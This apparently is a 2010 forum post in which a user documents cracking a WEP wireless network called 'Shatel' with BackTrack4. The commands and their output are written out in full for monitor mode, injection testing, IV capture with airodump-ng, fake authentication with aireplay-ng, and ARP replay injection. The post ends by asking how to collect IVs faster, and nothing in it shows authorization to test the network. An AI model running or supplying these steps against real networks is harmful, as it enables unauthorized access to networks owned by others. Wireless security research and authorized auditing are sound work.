Low #/s

I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.

My wireless card was:

Code:

root@bt:~# airmon-ng Interface Chipset Driver wlan0 Intel 4965/5xxx iwlagn - [phy0]

I changed it to monitor mode:

Code:

root@bt:~# airmon-ng start wlan0 6 Interface Chipset Driver wlan0 Intel 4965/5xxx iwlagn - [phy0] (monitor mode enabled on mon0)

And then I test injection:

Code:

root@bt:~# aireplay-ng -9 mon0 20:59:17 Trying broadcast probe requests... 20:59:17 Injection is working! 20:59:19 Found 1 AP 20:59:19 Trying directed probe requests... 20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel' 20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70 20:59:21 30/30: 100%

Then I started collecting IVs:

Code:

root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0 CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel BSSID STATION PWR Rate Lost Packets Probes 00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384

And then I made a fake authentication:

Code:

root@bt:~# macchanger -s mon0 Current MAC: 00:24:d6:11:62:18 (unknown) root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0 21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6 21:17:45 Sending Authentication Request (Open System) [ACK] 21:17:45 Authentication successful 21:17:45 Sending Association Request [ACK] 21:17:45 Association successful :-) (AID: 1) 21:17:55 Sending keep-alive packet

And finally I started injection:

Code:

root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0 20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6 Saving ARP requests in replay_arp-0311-203651.cap You should also start airodump-ng to capture replies. Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)

But injection didn't make any change in the speed of collecting packets(#/s).

I did this again:

Code:

root@bt:~# aireplay-ng -9 mon0 21:22:49 Trying broadcast probe requests... 21:22:51 No Answer... 21:22:51 Found 3 APs 21:22:51 Trying directed probe requests... 21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2' 21:22:57 0/30: 0% 21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel' 21:23:03 0/30: 0% 21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG' 21:23:09 0/30: 0%

and it seems that injection is not working!

What should I do?! How can I collects IVs faster?!(now, it takes days[or weeks!] to collect enough packets!)

Thanks!